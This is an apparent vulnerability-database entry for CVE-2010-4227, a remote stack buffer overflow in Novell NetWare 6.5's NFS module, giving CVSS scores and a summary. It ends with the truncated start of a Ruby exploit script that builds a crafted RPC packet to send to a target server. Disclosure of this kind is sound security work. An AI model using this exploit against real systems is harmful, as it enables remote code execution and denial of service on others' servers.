10
CVSSv2

CVE-2010-4227

Published: 25/02/2011 Updated: 10/10/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The xdrDecodeString function in XNFS.NLM in Novell Netware 6.5 before SP8 allows remote malicious users to cause a denial of service (abend) or execute arbitrary code via a crafted, signed value in a NFS RPC request to port UDP 1234, leading to a stack-based buffer overflow.

Vulnerable Product Search on Vulmon Subscribe to Product

novell netware 6.5

novell netware

Exploits

#!/usr/bin/ruby # Source: # wwwprotekresearchlabcom/indexphp?option=com_content&view=article&id=24&Itemid=24 require 'socket' netware_server = (ARGV[0]) target_port = (ARGV[1] || 1234) beepbeep= "\x1c\xd1\xef\xab" + # XID "\x00\x00\x00\x00" + # Message Type: Call (0) "\x00\x00\x00\x02" + # RPC Version: 2 "\x00\x01\x86\xa ...